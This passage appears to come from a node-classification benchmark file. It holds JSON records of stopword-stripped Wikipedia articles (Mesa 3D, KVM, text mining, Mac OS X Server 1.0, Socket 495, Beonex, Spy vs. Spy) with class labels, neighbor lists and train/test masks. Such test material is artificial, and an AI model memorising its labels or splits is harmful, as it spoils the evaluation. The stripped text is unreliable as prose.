4.5 features supported intel gen 8+ radeon gcn nvidia fermi kepler khronos-test 4.5-label experimental amd vulkan 1.0 support community driver radv opengl es 3.2 possible intel skylake gen9 1st stable version 2017 17.0 new year counting ready features certified opengl 4.5 opengl 4.5 intel haswell opengl 4.3 nvidia maxwell pascal gm107+ huge performance gain measured maxwell 1 geforce gtx 750 ti gm1xx maxwell-2-cards geforce gtx 980 gm2xx underclocked without nvidia information khronos cts test suite opengl 4.4 4.5 opengl es 3.0+ 2017-01-24 open source tests mesa 13 17 possible without costs 2nd stable version 2017 17.1.0 came 10 may 2017 interesting improvements opengl 4.2+ intel ivy bridge opengl 3.3+ intel open swr rasterizer 2 highlights note due modularized nature opengl mesa actually support extensions newer versions opengl without claiming full support versions example july 2016 mesa supported opengl es 3.1 also opengl es 3.2 extensions except five well number extensions part opengl opengl es version open question mesa linux high dynamic range hdr many problems open points pipe clean basic implementation 3rd version 17.2 available since september 2017 new opengl 4.6 features velocity improvements 3d intel amd 1.4 tests fail opengl 4.5 nouveau kepler 4th version 17.3 ready since december 2017 many improvements many drivers available opengl 4.6 nearly fully available spir-v ready amd vulkan driver radv fully conformant khronos-test 1st version 2018 18.0 available since march 2018 scheme 2017 full opengl 4.6 support ready many features improvements successfully tested rc3 10-bit support intel i965 colors also highlight new support intel cannon lake amd vega actual linux version amd evergreen chips rv800 r900 near opengl 4.5 support old amd r600 rv700 chips support opengl 3.3 features opengl 4.x freedreno driver adreno hardware near opengl 3.3 support 2nd version 2018 18.1 available since may target vulkan 1.1.72 intel anv amd radv driver opengl 4.6 spir-v also main target permanent work possible completion features optimization drivers older hardware like amd r600/evergreen nvidia tesla fermi kepler intel sandybridge ivybridge haswell broadwell arm architecture made also great improvements adreno 3xx/4xx/5xx broadwell vc4/vc5 raspi main target opengl es 3rd version 2018 18.2 available calendar stable september opengl 4.6 spir-v vulkan 1.1.80 wip soft driver virtual machines virgl ready opengl 4.3 opengl es 3.2 radeonsi also ready opengl es 3.2 astc texture compression support compatibility modus support opengl 4.4 3.1 18.1 highlights radeonsi amd gcn cards new vulkan 1.1 features intel amd available see details vulkan mesamatrix 4th version 2018 18.3 released stable version 18.3.1 december 2018 many features detail support newer hardware main parts full support opengl 4.6 ready 1st version 2019 19.0 released march full support opengl 4.6 ready many improvements way drivers 2nd version 2019 19.1 transition tgsi nir one main feature way opengl 4.6 spir-v opencl radeonsi runs well dev-version nir 3rd version 2019 19.2 opengl 4.6 ready intel iris driver khronos group officially announced vulkan api march 2015 officially released vulkan 1.0 february 16 2016 vulkan breaks compatibility opengl completely abandons monolithic state machine concept developers gallium3d called vulkan something along lines gallium3d 2.0 – gallium3d separates code implements opengl state machine code specific hardware gallium3d ingests tgsi vulkan ingests spir-v standard portable intermediate representation version v vulkan intel released implementation vulkan driver hardware day specification officially released mainlined april became part mesa 12.0 released july 2016 already i965 driver n't written according gallium3d specifications vulkan driver makes even less sense flange top gallium3d similarly technical reason flange nir yet intel employees implemented vulkan driver way expected amd proprietary vulkan driver released march announced released free open-source software future mainlined mesa also abandons gallium3d radv free project amd available since version 13 conformance khronos-test came version 17.3 actual full support vulkan 1.0 1.1 since mesa 18.1 nvidia released proprietary geforce driver vulkan support launch day imagination technologies powervr qualcomm adreno arm mali done least announced proprietary vulkan drivers android operating systems whether additional free open-source vulkan implementations gpus show remains seen mesa software driver virgl starts vulkan development 2018 gsoc projects support virtual machines kind memory barrier separates one buffer rest memory called fence fences ensure buffer overwritten rendering display operations completed implicit fencing used synchronization graphics drivers gpu hardware fence signals buffer longer used one component operated reused another past linux kernel implicit fencing mechanism fence directly attached buffer cf gem handles fds userspace unaware explicit fencing exposes fences userspace userspace gets fences direct rendering manager drm subsystem gpu explicit fencing required vulkan offers advantages tracing debugging linux kernel 4.9 added android synchronization framework mainline generic buffer management gbm api provides mechanism allocating buffers graphics rendering tied mesa gbm intended used native platform egl drm openwfd handle creates used initialize egl create render target buffers mesa gbm abstraction graphics driver specific buffer management apis instance various libdrm_* libraries implemented internally calling mesa gpu drivers example wayland compositor weston rendering using opengl es 2 initializes calling egl since server runs bare kms driver uses egl drm platform could really called gbm platform since relies mesa gbm interface xdc2014 nvidia employee andy ritger proposed enhance egl order replace gbm three possible ways calculations necessary encoding decoding video streams example nouveau developed part mesa also includes linux kernel component developed part linux kernel supports purevideo-branded asics provides access vdpau partly xvmc free radeon driver supports unified video decoder video coding engine vdpau openmax please note v4l2 kernel-to-user-space interface video bit streams delivered webcams tv tuners available free open-source device drivers graphic chipsets stewarded mesa existing free open-source implementation apis developed inside mesa currently two frameworks write graphics drivers classic gallium3d overview drivers available mesa given device drivers amd/ati r100 r800 intel nvidia cards 3d acceleration previously drivers existed ibm/toshiba/sony cell apu playstation 3 s3 virge savage chipsets via chipsets matrox g200 g400 free open-source drivers compete proprietary closed-source drivers depending availability hardware documentation man-power free open-source driver lag behind less supporting 3d acceleration new hardware also 3d rendering performance usually significantly slower notable exceptions today still true nouveau nvidia gpus amds radeon gpus open driver mostly matches exceeds proprietary driver performance time 3d graphics cards became mainstream pcs individuals partly supported companies began working adding support hardware-accelerated 3d rendering mesa direct rendering infrastructure dri one approaches interface mesa opengl 3d rendering api libraries device drivers hardware reaching basic level usability dri support officially added mesa significantly broadened available range hardware support achievable using mesa library adapting dri mesa library finally took role front end component full scale opengl framework varying backend components could offer different degrees 3d hardware support dropping full software rendering capability total system used many different software components design requires components interact carefully interfaces relatively fixed nonetheless components interacting mesa stack open source experimental work often done altering several components well interfaces experiments prove successful incorporated next major minor release applies e.g update dri specification developed 2007-2008 timeframe result experimentation dri2 operates without locks improved back buffer support special git branch mesa created dri3 supported intel driver since 2013 default linux distributions since 2016 enable vulkan support also default amd hardware since late 2016 x.org server 1.18.3 newer mesa also contains implementation software rendering called swrast allows shaders run cpu fallback graphics hardware accelerators present gallium software rasterizer known softpipe built support llvm llvmpipe generates cpu code runtime since mesa 10.x opengl 3.3+ supported softpipe 10.3 llvmpipe 10.2 actual 80 features opengl 4.x implemented mesa 17.3 see mesamatrix mesa 12.0 new intel rasterizer openswr available high advantages clusters large data sets focused engineering visualisation game art imagery work x86 processors hand opengl 3.1+ supported acceleration values 29 51 related llvmpipe measured examples change option gallium_driver= swr necessary opengl 3.3+ supported openswr since mesa 17.1 virgl rasterizer virtual machines implemented mesa 11.1 since 2015 opengl 3.3 support showed mesamatrix since mesa 18 actual new mesa 18.2 supports others opengl 4.3 opengl es 3.2 80 opengl 4.4 4.5 features also ready vulkan development starts gsoc 2018 projects idea bundling multiple drivers single mega driver proposed eric anholt allows single copy shared mesa code used among multiple drivers instead existing driver separately offering better performance separate shared library due removal internal library interface state trackers vdpau xvmc become separate libraries shader-db collection 20,000 shaders gathered various computer games benchmarks well scripts compile collect statistics shader-db intended help validate optimization noticed unexpected number shaders hand-written generated means shaders originally written hlsl translated glsl translator program e.g hlsl2glsl problem generated code often far optimal matt turner said much easier fix translator program make mesa compiler carry burden dealing bloated shaders shader-db considered free open-source software use legally one must license computer games shaders part least valve corporation granted mesa debian developers free personal licenses games distributed steam so-called user-mode graphics device drivers umd mesa commonalities generally called device driver couple differences one goal mesa optimization code executed respective gpu another sharing code instead documenting pieces software wikipedia article shall instead look intermediate representations used process compiling optimizing see abstract syntax tree ast static single assignment form ssa form spir-v certain version standard portable intermediate representation idea graphics applications output spir-v instead glsl contrast latter spir-v binary avoid implementation differences glsl compiler frontends different driver implementations major source application incompatiblities bugs also spir-v binary usually also passed general optimizations also degree spir-v binary representation offers degree obfuscation might appeal software vendors form intellectual property protection however spir-v contains ample information reflection tools exist translate spir-v back high quality human readable high level code umd needs apply optimizations specific supported hardware nir extended next releases base spir-v support llvmpipe radeonsi noveau change next nir tgsi tungsten graphics shader infrastructure tgsi introduced 2008 tungsten graphics gallium3d-style umds ingest tgsi umds codice_2 codice_3 output machine code instead llvm ir llvm optimizations compilation machine code mean certain minimum version llvm installed well mesa glsl compiler generates ir driver different requirements lir differentiates hir high-level ir lir low-level ir gallium3d set interfaces collection supporting libraries intended ease programming device drivers 3d graphics chipsets multiple operating systems rendering video acceleration apis feature matrix provided galliumstatus efforts writing free open-source device drivers graphics chips separately documented wikipedia free open-source graphics device driver development gallium3d started 2008 tungsten graphics implementation available free open-source software part mesa 3d hosted freedesktop.org primary goal making driver development easier bundling otherwise duplicated code several different drivers single point support modern hardware architectures done providing better division labor example leaving memory management kernel dri driver gallium3d part mesa since 2009 currently used free open-source graphics driver nvidia nouveau project r300–r900 free open-source gpu device drivers gallium3d eases programming device drivers splitting graphics device driver three parts accomplished introduction two interfaces gallium3d state tracker interface gallium3d winsys interface three components called gallium3d state tracker gallium3d hardware device driver gallium3d winsys gallium3d provides unified api exposing standard hardware functions shader units found modern hardware thus 3d apis opengl 1.x/2.x opengl 3.x openvg gpgpu infrastructure even direct3d found wine compatibility layer need single back-end called state tracker targeting gallium3d api contrast classic-style dri device drivers require different back-end hardware platform several apis need translation opengl expense code duplication vendor device drivers due proprietary closed-source nature written way meaning e.g amd catalyst implements opengl direct3d vendor drivers geforce implementations gallium3d direct rendering manager drm kernel drivers manage memory direct rendering interface dri2 drivers gpu processing oriented transition period userspace modesetting kernelspace modesetting mesa 3d drivers radeon driver intel drivers ended supporting dri1 dri2 used dri2 available system gallium3d additionally requires level shader support available older cards like e.g ati r100-r200 users cards need keep using mesa 3d dri2 3d usage tungsten graphics shader infrastructure tgsi intermediate representation like llvm intermediate representation new standard portable intermediate representation spir used vulkan api opencl 2.1 shaders written opengl shading language translated/compiled tgsi optimizations made tgsi shaders compiled shaders instruction set used gpu addition using modular structure gallium3d effort underway use llvm compiler suite create module optimize shader code fly library represents shader program using extensible binary intermediate representation called tungsten graphics shader infrastructure tgsi llvm translates glsl shaders optimized target hardware several free open-source graphics device drivers written based information gained clean-room reverse engineering adopted driver model provided gallium3d e.g nouveau others see free open-source graphics device driver complete list main reason may gallium3d driver model lessens amount code required written course licensed free software license code time anybody rewritten implement dri- driver model original authors gallium3d keith whitwell brian paul tungsten graphics acquired vmware 2008 fall 2011 least 10 known mature working gallium3d drivers open-source drivers nvidia graphics cards name nouveau team develops drivers using gallium3d framework 2008-07-13 nouveau development done exclusively gallium framework old dri driver removed master branch mesa repository freedesktop.org 2009-02-11 gallium-0.2 branch merged mainline master branch mesa development done mesa mainline 2009-02-25 gallium3d run linux well freebsd kernels 2009-05-01 zack rusin tungsten graphics added openvg state tracker mesa 3d enables scalable vector graphics hardware-accelerated gallium3d-based driver 2009-07-17 mesa3d 7.5 released first version include gallium3d 2010-09-10 initial support evergreen gpus added r600g driver 2010-09-21 two gallium3d drivers ati hardware known r300g r600g r300-r500 r600-evergreen gpus respectively 2010-09-21 major commits made code support direct3d 10 11 time might offer ability use recent direct3d implementations gnu/linux systems 2011-11-30 intel 965g cell gallium drivers removed master branch mesa unmaintained broken 2013-11-30 mesa 10 opengl 3.2 3.3 opencl 1.0+ 2014-11-18 major commits made code support direct3d 9 2015-09-15 mesa 11 opengl 4.0 4.1 opencl 1.2 incomplete 2015-12-15 mesa 11.1 driver virgl virtual machines opengl 3.3 2016-07-08 mesa 12 opengl 4.2 4.3 vulkan 1.0 intel anv amd radv 2016-11-01 mesa 13 opengl 4.4 opengl es 3.2 2017-02-13 mesa 17.0 opengl 4.5 freedreno driver opengl 3.0 3.1 2017-05-10 mesa 17.1 opengl 4.2+ intel ivy bridge intel driver windows opengl 3.3+ intel open swr rasterizer important cluster computer huge simulations 2017-12-08 mesa 17.3 amd vulkan driver radv full compliant khronos test vulkan 1.0 2018-05-18 mesa 18.1 vulkan 1.1 intel anv amd radv 2018-09-07 mesa 18.2 opengl 4.3 soft driver virgl important virtual machines cloud cluster computer opengl es 3.1 freedreno adreno a5xx project initiator brian paul graphics hobbyist thought would fun implement simple 3d graphics library using opengl api might use instead vogl ordinary gl like library beginning 1993 spent eighteen months part-time development released software internet software well received people began contributing development mesa started rendering 3d computer graphics cpu despite internal architecture mesa designed open attaching graphics processor-accelerated 3d rendering first phase rendering done indirectly display server leaving overhead noticeable speed lagging behind theoretical maximum diamond monster 3d using voodoo graphics chipset one first 3d hardware devices supported mesa first true graphics hardware support added mesa 1997 based upon glide api new 3dfx voodoo i/ii graphics cards successors major problem using glide acceleration layer habit glide run full screen suitable computer games glide took lock screen memory thus display server blocked gui tasks",
    "neighbors": [
      9604,
      1801,
      5514,
      2955,
      6153,
      7309,
      3734,
      2711,
      4886,
      9882,
      10016,
      10785,
      10658,
      8995,
      6180,
      4902,
      6311,
      6694,
      10407,
      7978,
      8621,
      7983,
      1842,
      439,
      823,
      2361,
      11322,
      9276,
      9533,
      10173,
      9151,
      833,
      6981,
      2383,
      10703,
      5975,
      3033,
      7421,
      10971,
      477,
      11485,
      1632,
      6625,
      8937,
      1770,
      5867,
      1644,
      4332,
      5612,
      8685,
      1776,
      8304,
      10480,
      10860,
      2804,
      7540,
      2045,
      11135
    ],
    "mask": "None"
  },
  {
    "node_id": 8439,
    "label": 2,
    "text": "Kernel-based_Virtual_Machine:kernel-based virtual machine kernel-based virtual machine kvm virtualization module linux kernel allows kernel function hypervisor merged linux kernel mainline kernel version 2.6.20 released february 5 2007 kvm requires processor hardware virtualization extensions intel vt amd-v. kvm also ported operating systems freebsd illumos form loadable kernel modules kvm originally designed x86 processors since ported s/390 powerpc ia-64 arm kvm provides hardware-assisted virtualization wide variety guest operating systems including linux bsd solaris windows haiku reactos plan 9 aros research operating system macos addition android 2.2 gnu/hurd debian k16 minix 3.1.2a solaris 10 u3 darwin 8.0.1 together operating systems newer versions listed known work certain limitations additionally kvm provides paravirtualization support linux openbsd freebsd netbsd plan 9 windows guests using virtio api includes paravirtual ethernet card disk i/o controller balloon device vga graphics interface using spice vmware drivers avi kivity began development kvm qumranet technology startup company acquired red hat 2008 kvm surfaced october 2006 merged linux kernel mainline kernel version 2.6.20 released 5 february 2007 kvm maintained paolo bonzini kvm perform emulation instead exposes /dev/kvm interface userspace host use linux qemu versions 0.10.1 later one userspace host qemu uses kvm available virtualize guests near-native speeds otherwise falls back software-only emulation internally kvm uses seabios open source implementation 16-bit x86 bios kvm support hot plug vcpus dynamic memory management live migration since february 2007 among features kvm parts licensed various gnu licenses",
    "neighbors": [
      6150,
      4616,
      6153,
      2058,
      3082,
      18,
      5139,
      10264,
      10776,
      10780,
      10785,
      6180,
      8242,
      9266,
      7733,
      4161,
      5697,
      8772,
      6213,
      3654,
      5702,
      8266,
      8268,
      589,
      1102,
      7248,
      593,
      10851,
      6244,
      11363,
      5222,
      10856,
      4207,
      4729,
      10363,
      5244,
      4734,
      11391,
      2179,
      7812,
      6797,
      4238,
      7821,
      10382,
      11410,
      2195,
      2711,
      6808,
      9882,
      1694,
      11423,
      2723,
      2212,
      5800,
      8364,
      7349,
      10933,
      3255,
      5815,
      7354,
      2236,
      5822,
      5824,
      10433,
      1736,
      2762,
      8909,
      6352,
      8410,
      10971,
      4831,
      8928,
      1761,
      2278,
      233,
      7403,
      5356,
      9964,
      9455,
      1776,
      10482,
      2294,
      2809,
      8700,
      5378,
      4360,
      1291,
      6924,
      4367,
      8466,
      5397,
      792,
      10016,
      6438,
      295,
      10537,
      7983,
      9525,
      6968,
      7992,
      318,
      3911,
      8520,
      6988,
      4429,
      2383,
      10063,
      1362,
      7507,
      11606,
      5975,
      6999,
      11095,
      349,
      2910,
      863,
      10091,
      11631,
      7540,
      6013,
      1406,
      8573,
      11135,
      8066,
      900,
      394,
      5514,
      4493,
      5006,
      9621,
      1431,
      8602,
      11678,
      7584,
      1444,
      1445,
      9637,
      935,
      4521,
      4011,
      1456,
      8625,
      1972,
      9655,
      5049,
      9667,
      8136,
      457,
      7117,
      7134,
      2529,
      6625,
      8676,
      2021,
      1513,
      1515,
      3055,
      5105,
      499,
      2036,
      5620,
      8186,
      2044,
      2045,
      3582
    ],
    "mask": "Train"
  },
  {
    "node_id": 8440,
    "label": 0,
    "text": "Text_mining:text mining text mining also referred text data mining roughly equivalent text analytics process deriving high-quality information text high-quality information typically derived devising patterns trends means statistical pattern learning text mining usually involves process structuring input text usually parsing along addition derived linguistic features removal others subsequent insertion database deriving patterns within structured data finally evaluation interpretation output 'high quality text mining usually refers combination relevance novelty interest typical text mining tasks include text categorization text clustering concept/entity extraction production granular taxonomies sentiment analysis document summarization entity relation modeling i.e learning relations named entities text analysis involves information retrieval lexical analysis study word frequency distributions pattern recognition tagging/annotation information extraction data mining techniques including link association analysis visualization predictive analytics overarching goal essentially turn text data analysis via application natural language processing nlp analytical methods typical application scan set documents written natural language either model document set predictive classification purposes populate database search index information extracted term text analytics describes set linguistic statistical machine learning techniques model structure information content textual sources business intelligence exploratory data analysis research investigation term roughly synonymous text mining indeed ronen feldman modified 2000 description text mining 2004 describe text analytics latter term used frequently business settings text mining used earliest application areas dating 1980s notably life-sciences research government intelligence term text analytics also describes application text analytics respond business problems whether independently conjunction query analysis fielded numerical data truism 80 percent business-relevant information originates unstructured form primarily text techniques processes discover present knowledge – facts business rules relationships – otherwise locked textual form impenetrable automated processing subtasks—components larger text-analytics effort—typically include text mining technology broadly applied wide variety government research business needs three groups may use text mining records management searching documents relevant daily activities legal professionals may use text mining e-discovery governments military groups use text mining national security intelligence purposes scientific researchers incorporate text mining approaches efforts organize large sets text data i.e. addressing problem unstructured data determine ideas communicated text e.g. sentiment analysis social media support scientific discovery fields life sciences bioinformatics business applications used support competitive intelligence automated ad placement among numerous activities many text mining software packages marketed security applications especially monitoring analysis online plain text sources internet news blogs etc national security purposes also involved study text encryption/decryption range text mining applications biomedical literature described including computational approaches assist studies protein docking protein interactions protein-disease associations addition large patient textual datasets clinical field datasets demographic information population studies adverse event reports text mining facilitate clinical studies precision medicine text mining algorithms facilitate stratification indexing specific clinical events large patient textual datasets symptoms side effects comorbidities electronic health records event reports reports specific diagnostic tests one online text mining application biomedical literature pubgene publicly accessible search engine combines biomedical text mining network visualization gopubmed knowledge-based search engine biomedical texts text mining techniques also enable us extract unknown knowledge unstructured documents clinical domain text mining methods software also researched developed major firms including ibm microsoft automate mining analysis processes different firms working area search indexing general way improve results within public sector much effort concentrated creating software tracking monitoring terrorist activities text mining used large media companies tribune company clarify information provide readers greater search experiences turn increases site stickiness revenue additionally back end editors benefiting able share associate package news across properties significantly increasing opportunities monetize content text mining starting used marketing well specifically analytical customer relationship management coussement van den poel 2008 ref name= 10.1016/j.im.2008.01.005 /ref apply improve predictive analytics models customer churn customer attrition text mining also applied stock returns prediction sentiment analysis may involve analysis movie reviews estimating favorable review movie analysis may need labeled data set labeling affectivity words resources affectivity words concepts made wordnet conceptnet respectively text used detect emotions related area affective computing text based approaches affective computing used multiple corpora students evaluations children stories news stories issue text mining importance publishers hold large databases information needing indexing retrieval especially true scientific disciplines highly specific information often contained within written text therefore initiatives taken nature proposal open text mining interface otmi national institutes health common journal publishing document type definition dtd would provide semantic cues machines answer specific queries contained within text without removing publisher barriers public access academic institutions also become involved text mining initiative computational methods developed assist information retrieval scientific literature published approaches include methods searching determining novelty clarifying homonyms among technical reports automatic analysis vast textual corpora created possibility scholars analyze millions documents multiple languages limited manual intervention key enabling technologies parsing machine translation topic categorization machine learning automatic parsing textual corpora enabled extraction actors relational networks vast scale turning textual data network data resulting networks contain thousands nodes analyzed using tools network theory identify key actors key communities parties general properties robustness structural stability overall network centrality certain nodes automates approach introduced quantitative narrative analysis whereby subject-verb-object triplets identified pairs actors linked action pairs formed actor-object content analysis traditional part social sciences media studies long time automation content analysis allowed big data revolution take place field studies social media newspaper content include millions news items gender bias readability content similarity reader preferences even mood analyzed based text mining methods millions documents analysis readability gender bias topic bias demonstrated flaounas et al showing different topics different gender biases levels readability possibility detect mood patterns vast population analyzing twitter content demonstrated well text mining computer programs available many commercial open source companies sources see list text mining software lack flexibilities european copyright database law mining in-copyright works web mining without permission copyright owner illegal uk 2014 recommendation hargreaves review government amended copyright law allow text mining limitation exception second country world following japan introduced mining-specific exception 2009 however owing restriction copyright directive uk exception allows content mining non-commercial purposes uk copyright law allow provision overridden contractual terms conditions european commission facilitated stakeholder discussion text data mining 2013 title licenses europe fact focus solution legal issue licenses limitations exceptions copyright law led representatives universities researchers libraries civil society groups open access publishers leave stakeholder dialogue may 2013 contrast europe flexible nature us copyright law particular fair use means text mining america well fair use countries israel taiwan south korea viewed legal text mining transformative meaning supplant original work viewed lawful fair use example part google book settlement presiding judge case ruled google digitization project in-copyright books lawful part transformative uses digitization project displayed—one use text data mining recently websites often used text-based searches found documents containing specific user-defined words phrases use semantic web text mining find content based meaning context rather specific word additionally text mining software used build large dossiers information specific people events example large datasets based data extracted news reports built facilitate social networks analysis counter-intelligence effect text mining software may act capacity similar intelligence analyst research librarian albeit limited scope analysis text mining also used email spam filters way determining characteristics messages likely advertisements unwanted material text mining plays important role determining financial market sentiment increasing interest paid multilingual data mining ability gain information across languages cluster similar items different linguistic sources according meaning challenge exploiting large proportion enterprise information originates unstructured form recognized decades recognized earliest definition business intelligence bi october 1958 ibm journal article h.p luhn business intelligence system describes system ... utilize data-processing machines auto-abstracting auto-encoding documents creating interest profiles 'action points organization incoming internally generated documents automatically abstracted characterized word pattern sent automatically appropriate action points yet management information systems developed starting 1960s bi emerged '80s '90s software category field practice emphasis numerical data stored relational databases surprising text unstructured documents hard process emergence text analytics current form stems refocusing research late 1990s algorithm development application described prof. marti a. hearst paper untangling text data mining almost decade computational linguistics community viewed large text collections resource tapped order produce better text analysis algorithms paper attempted suggest new emphasis use large online text collections discover new facts trends world suggest make progress need fully artificial intelligent text analysis rather mixture computationally-driven user-guided analysis may open door exciting new results hearst 1999 statement need fairly well describes state text analytics technology practice decade later",
    "neighbors": [
      2176,
      10497,
      5122,
      1027,
      5635,
      2440,
      2059,
      140,
      3979,
      2318,
      6798,
      11538,
      10231,
      1044,
      5399,
      2456,
      8216,
      538,
      416,
      4131,
      5288,
      10794,
      3629,
      2223,
      3888,
      7599,
      4531,
      4662,
      3127,
      2488,
      10557,
      6208,
      5830,
      10313,
      5450,
      3533,
      5197,
      6223,
      10319,
      10577,
      2901,
      8538,
      2652,
      5212,
      5857,
      7780,
      9956,
      4072,
      4840,
      7918,
      8046,
      8688,
      113,
      9072,
      3191,
      3323,
      7164
    ],
    "mask": "Test"
  },
  {
    "node_id": 8441,
    "label": 2,
    "text": "Mac_OS_X_Server_1.0:mac os x server 1.0 mac os x server 1.0 released march 16 1999 first operating system released retail market apple computer based next technology final release product code-named rhapsody interim combination openstep system mach os openstep api mac os 8 although mac os x server 1.0 graphical look feel variation platinum theme mac os 8 infrastructure based openstep thus nextstep operating system instead classic mac os resulting product gave users preview operating system become mac os x referred macos mac os x server never officially known simply mac os x ultimately rendered obsolete mac os x v10.0 2001 macos server server 1.0 contains mix features classic mac os nextstep mac os x like classic mac os single menu bar across top screen file management performed workspace manager nextstep instead classic mac os finder user interface still uses display postscript-based window server nextstep instead quartz-based windowserver would appear year later mac os x public beta unlike version classic mac os windows unsaved content display black dot window close button like nextstep dock aqua appearance included added later mac os x carbon essentially subset classic mac os api calls also absent meant native applications os x server 1.0 written yellow box api went become known cocoa furthermore apple firewire supported server 1.0 also includes first version netboot server allows computers boot disk image local network particularly useful school public-machine setting allowed machines booted single os copy stored server 1.0 made difficult users damage os installing software – soon signed machine would re-boot fresh os netboot server run classic mac os applications mac os x server 1.0 includes blue box essentially ran copy mac os 8.5.1 could updated mac os 8.6 version 1.2 later separate process emulation layer blue box would eventually renamed classic environment mac os x featuring latest version mac os 9",
    "neighbors": [
      10755,
      9732,
      1542,
      4615,
      2571,
      1549,
      5647,
      1042,
      4114,
      6186,
      6700,
      4657,
      1074,
      8754,
      9784,
      8767,
      576,
      8774,
      9802,
      5713,
      3670,
      1623,
      4184,
      9308,
      2141,
      4702,
      3167,
      3681,
      2149,
      3691,
      8303,
      8304,
      6771,
      2676,
      6264,
      2686,
      7806,
      9343,
      3719,
      10888,
      11402,
      7307,
      8852,
      1686,
      7318,
      5784,
      4251,
      3228,
      2207,
      1699,
      11430,
      168,
      3241,
      171,
      5292,
      8877,
      1710,
      3248,
      3766,
      2232,
      9912,
      9406,
      1729,
      6849,
      6855,
      713,
      9418,
      3790,
      7378,
      8404,
      3286,
      9430,
      3289,
      4318,
      231,
      6377,
      2282,
      9451,
      4844,
      2288,
      5363,
      7928,
      11513,
      7422,
      11521,
      2819,
      1796,
      9487,
      9999,
      10512,
      5397,
      4888,
      11037,
      811,
      3371,
      7983,
      10036,
      7991,
      9529,
      2363,
      7483,
      2365,
      2366,
      9022,
      1346,
      10052,
      4933,
      838,
      9035,
      1878,
      6495,
      865,
      9063,
      4457,
      10602,
      3948,
      10608,
      5492,
      6023,
      7561,
      6539,
      9100,
      7057,
      9109,
      1439,
      9123,
      11171,
      9151,
      6093,
      7118,
      3035,
      4571,
      7133,
      4068,
      5093,
      487,
      8170,
      10221,
      7154,
      5619,
      11257,
      7163,
      8700,
      6654
    ],
    "mask": "None"
  },
  {
    "node_id": 8442,
    "label": 3,
    "text": "Socket_495:socket 495 socket 495 sometimes referred µpga2 cpu socket intel pentium iii celeron mobile processors socket also used microsoft xbox console bga ball grid array format socket replaced socket 615 µpga1 used pentium ii early celeron mobile processors socket 495 pin cpu socket designed house processor socket 495 package socket 1.27mm pitch designed support heatsink",
    "neighbors": [
      3588,
      5901,
      5523,
      2455,
      3992,
      8855,
      11417,
      3995,
      4252,
      6175,
      7714,
      10019,
      4523,
      2604,
      2350,
      6192,
      9649,
      4537,
      7105,
      4805,
      7110,
      8394,
      3403,
      4427,
      4179,
      3798,
      4185,
      7002,
      9945,
      11484,
      9570,
      10468,
      613,
      8552,
      1260,
      4717,
      10225,
      371,
      9592
    ],
    "mask": "Test"
  },
  {
    "node_id": 8443,
    "label": 5,
    "text": "Beonex_Communicator:beonex communicator beonex communicator discontinued open-source internet suite based mozilla application suite mas ben bucksch german mozilla developer intended higher security privacy level commercial products internet suite contains web browser email news client html editor based mozilla composer irc client based chatzilla beonex business services offered suite free provided documentation easy install routines third-party plug-ins tried sell support customer-specific changes browser main goal implement kerberos openpgp ldap beonex marked failed mid-2004 discontinued reaching production release stage mozilla organization stated mozilla application suite developers testing purposes meant end users 5 january 2001 beonex included linux distribution kmlinux version s-0.4 removed version s-0.5 released 23 march 2001 beonex 0.8 released june 2002 received positive reviews speed beonex launcher beol spoken b-o-l additional upcoming product never left alpha status stripped-down version beonex communicator web browser combined email client chat client preview releases version 0.9 mid-2002 bucksch showed new features wanted integrate version gained stable status announced 2 march 2004 new releases planned mozilla foundation decided future policy 2005 mozilla foundation officially changed policies created mozilla corporation provide end-user support beonex communicator 0.8.2-stable several known security issues beonex never received much market share browser transmit referrers default possibility create fake referrers browser deletes cookies upon exiting disables several javascript functions could served attack vectors beonex also allows changing user agent following comparison table releases netscape mas included complete table see gecko layout engine contrast netscape beonex included nearly features except proprietary parts like integrated net2phone aol instant messenger online chatting chatzilla integrated sidebar search engines also pre-configured beonex less resource-intensive netscape beonex includes migration tool import old profiles netscape communicator beonex communicator fork mas rather separate branch significant changes made html email javascript turned default thus displays email plain text bold cursive additions added later mas 1.1 search engines compatible mycroft project located sidebar providing features",
    "neighbors": [
      513,
      6657,
      9736,
      2579,
      9747,
      6171,
      9757,
      7713,
      3110,
      10791,
      9770,
      559,
      1075,
      2101,
      4661,
      3639,
      10808,
      3643,
      9275,
      64,
      9281,
      5707,
      3578,
      10834,
      6231,
      7255,
      8281,
      6747,
      5724,
      1642,
      9834,
      10860,
      10861,
      9841,
      115,
      9843,
      3191,
      119,
      4728,
      637,
      1664,
      5251,
      2182,
      6791,
      6797,
      11418,
      10910,
      8351,
      7340,
      1713,
      9394,
      9908,
      7861,
      9909,
      185,
      11449,
      4797,
      7364,
      11466,
      10956,
      7885,
      11469,
      9424,
      7889,
      4310,
      2777,
      8923,
      737,
      4326,
      4331,
      4844,
      9451,
      9459,
      9986,
      9987,
      7943,
      1295,
      1807,
      7951,
      2836,
      278,
      3350,
      10006,
      7965,
      1834,
      7983,
      823,
      10057,
      11082,
      10060,
      2893,
      10078,
      11112,
      8557,
      7543,
      3961,
      7036,
      6528,
      3971,
      3462,
      8584,
      3465,
      6028,
      7572,
      5026,
      9642,
      944,
      5054,
      10174,
      9152,
      6086,
      3015,
      4048,
      6098,
      5078,
      479,
      482,
      10722,
      5605,
      487,
      8169,
      494,
      1520,
      7152,
      6133,
      5622,
      5114,
      6143
    ],
    "mask": "Test"
  },
  {
    "node_id": 8444,
    "label": 3,
    "text": "Spy_vs._Spy_(1984_video_game):spy vs. spy 1984 video game spy vs. spy game written michael riedel commodore 64 published first star software 1984 port atari 8-bit family released simultaneously two-player split-screen game based mad magazine long running cartoon strip spy vs. spy slapstick antics two spies trying kill improbably elaborate traps weapons ported apple ii zx spectrum acorn electron atari st bbc micro commodore 16 msx amstrad cpc amiga master system game boy game boy color nintendo entertainment system emulated game boy advance object game collect various secret items briefcase exit building door airport opposing player timer runs searching items traps laid take opponent player careless spy personal countdown timer depletes 30 seconds upon death arena embassy constructed series interconnected rooms laid grid pattern higher levels rooms therefore larger play area well hand-to-hand combat achieved wiggling joystick directional pad left right spies proximity spies place traps furniture doors occupy playing area traps triggered spy searches piece furniture item opens booby trapped door resulting cartoon style animation showing subject shot blown etc floating heaven angel strategy introduced limiting quantity trap spy use allowing traps triggered either spy pieces furniture also contain 'remedies match specific traps – allow trap defused fetched one time video magazine described rousing action-strategy contest praised game excellent graphics befit ting game rooted visual medium reviewer also noted one successfully captured original feel source offered satisfying result ahoy agreed review calling faithful adaptation comics praising simultaneous two-player one-player options antic called one original clever games atari computers yet magazine praised simultaneous two-player display concluded recommend game highly enough zx spectrum version rated number 20 sinclair official top 100 games time remake including original version released ios 2012 longer available two sequels original 1984 game produced spy vs. spy 